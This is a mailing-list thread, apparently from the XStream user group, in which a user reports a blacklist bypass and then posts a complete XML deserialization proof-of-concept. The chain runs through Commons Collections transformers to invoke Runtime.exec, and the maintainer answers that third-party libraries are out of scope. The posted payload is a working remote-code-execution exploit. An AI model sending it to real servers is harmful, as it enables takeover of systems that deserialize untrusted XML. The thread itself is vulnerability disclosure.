I found a new chain and used Java runtime to bypass the blacklist, and want to report this issue to XStream. How can i report this issue's detail?
96 views
Skip to first unread message
万人往
May 25, 2021, 11:18:39 PM5/25/21
to XStream User
I found a new chain a to bypass the blacklist, and want to report this issue to XStream. How can i report this issue's detail?
Jörg Schaible
May 26, 2021, 5:29:07 AM5/26/21
to xstrea...@googlegroups.com
Am Mittwoch, 26. Mai 2021, 05:18:39 CEST schrieb 万人往:
> I found a new chain a to bypass the blacklist, and want to report this
> issue to XStream. How can i report this issue's detail?
You have been invited to XStream's Security list, please report there.
> I found a new chain a to bypass the blacklist, and want to report this
> issue to XStream. How can i report this issue's detail?
Regards.
Jörg
万人往
May 30, 2021, 10:15:52 PM5/30/21
to XStream User
Description:Directly trigger the deserialization payload of the java native library through xstream, including but not limited to jdk 7u21, 8u20, CommonsCOllections series
Conditions of use:When 小stream and commons-collections=3.1exist at the same time,Can cause RCE
POC:
<set>
<org.apache.commons.collections.keyvalue.TiedMapEntry>
<map class="org.apache.commons.collections.map.LazyMap" serialization="custom">
<unserializable-parents/>
<org.apache.commons.collections.map.LazyMap>
<default>
<factory class="org.apache.commons.collections.functors.ChainedTransformer">
<iTransformers>
<org.apache.commons.collections.functors.ConstantTransformer>
<iConstant class="java-class">java.lang.Runtime</iConstant>
</org.apache.commons.collections.functors.ConstantTransformer>
<org.apache.commons.collections.functors.InvokerTransformer>
<iMethodName>getMethod</iMethodName>
<iParamTypes>
<java-class>java.lang.String</java-class>
<java-class>[Ljava.lang.Class;</java-class>
</iParamTypes>
<iArgs>
<string>getRuntime</string>
<java-class-array/>
</iArgs>
</org.apache.commons.collections.functors.InvokerTransformer>
<org.apache.commons.collections.functors.InvokerTransformer>
<iMethodName>invoke</iMethodName>
<iParamTypes>
<java-class>java.lang.Object</java-class>
<java-class>[Ljava.lang.Object;</java-class>
</iParamTypes>
<iArgs>
<null/>
<object-array/>
</iArgs>
</org.apache.commons.collections.functors.InvokerTransformer>
<org.apache.commons.collections.functors.InvokerTransformer>
<iMethodName>exec</iMethodName>
<iParamTypes>
<java-class>java.lang.String</java-class>
</iParamTypes>
<iArgs class="string-array">
<string>open /System/Applications/Calculator.app</string>
</iArgs>
</org.apache.commons.collections.functors.InvokerTransformer>
<org.apache.commons.collections.functors.ConstantTransformer>
<iConstant class="int">1</iConstant>
</org.apache.commons.collections.functors.ConstantTransformer>
</iTransformers>
</factory>
</default>
<map/>
</org.apache.commons.collections.map.LazyMap>
</map>
<key class="string">foo</key>
</org.apache.commons.collections.keyvalue.TiedMapEntry>
</set>
Lai Han of nsfocus security team
May 30, 2021, 10:16:59 PM5/30/21
to XStream User
官方好像不收这种需要三方库的漏洞
Jörg Schaible
Jun 7, 2021, 5:38:01 PM6/7/21
to XStream User
Hi,
On Monday, 31. May 2021, 04:15:52 CEST 万人往 wrote:
> Description:Directly trigger the deserialization payload of the java native
> library through xstream, including but not limited to jdk 7u21, 8u20,
> CommonsCOllections series
3rd party libraries are beyond XStream's responsibility.
Regards,
Jörg
On Monday, 31. May 2021, 04:15:52 CEST 万人往 wrote:
> Description:Directly trigger the deserialization payload of the java native
> library through xstream, including but not limited to jdk 7u21, 8u20,
> CommonsCOllections series
Regards,
Jörg
Reply all
Reply to author
Forward
0 new messages